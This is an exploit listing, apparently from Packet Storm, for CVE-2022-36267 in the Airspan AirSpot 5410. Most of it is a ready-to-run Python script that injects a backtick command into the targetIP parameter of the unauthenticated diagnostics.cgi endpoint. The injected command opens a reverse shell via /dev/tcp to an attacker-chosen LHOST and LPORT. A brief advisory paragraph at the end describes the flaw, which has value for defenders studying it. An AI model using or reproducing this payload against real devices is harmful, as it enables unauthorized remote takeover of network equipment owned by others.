

AirSpot 5410 Remote Command Injection

AirSpot 5410 versions and below suffer from an unauthenticated remote command injection vulnerability.

Packet Storm
# -*- coding: utf-8 -*-# Exploit Title: AirSpot unauthenticated remote command injection# Date: 7/26/2022# Exploit Author: Samy Younsi (NSLABS) ( Vendor Homepage: Software Link: Version: and under.# Tested on: Airspan AirSpot 5410 version (Ubuntu)# CVE : CVE-2022-36267from __future__ import print_function, unicode_literalsimport argparseimport requestsimport urllib3urllib3.disable_warnings()def banner():  airspanLogo = """       ,-.     / \  `.  __..-,O    :   \ --''_..-'.'    |    . .-' `. '.    :     .     .`.'     \     `.  /  ..      \      `.   ' .       `,       `.   \      ,|,`.        `-.\     '.||  ``-...__..-`      |  | Airspan       |__| AirSpot 5410      /||\ PWNED x_x     //||\\    // || \\ __//__||__\\__'--------------'Necrum Security Labs                        \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m                                                                 FOR EDUCATIONAL PURPOSE ONLY.     """  return print('\033[1;94m{}\033[1;m'.format(airspanLogo))def pingWebInterface(RHOST, RPORT):  url = 'https://{}:{}'.format(RHOST, RPORT)  try:    response = requests.get(url, allow_redirects=False, verify=False, timeout=30)    if response.status_code != 200:      print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')      exit()    print('[INFO] Airspan device web interface seems reachable!')  except:    print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')    exit()def execReverseShell(RHOST, RPORT, LHOST, LPORT):  payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)  data = 'Command=pingDiagnostic&targetIP={}&packetSize=55&timeOut=10&count=1'.format(payload)  try:    print('[INFO] Executing reverse shell...')    response ='https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)    print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))    return  except Exception as e:      print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)      return Falsedef main():  banner()  args = parser.parse_args()  pingWebInterface(args.RHOST, args.RPORT)  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)if __name__ == "__main__":  parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)  parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)  parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)  main()

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In Airspan AirSpot 5410 version and under there exists a Unauthenticated remote command injection vulnerability. The ping functionality can be called without user authentication when crafting a malicious http request by injecting code in one of the parameters allowing for remote code execution. This vulnerability is exploited via the binary file /home/www/cgi-bin/diagnostics.cgi that accepts unauthenticated requests and unsanitized data. As a result, a malicious actor can craft a specific request and interact remotely with the device.

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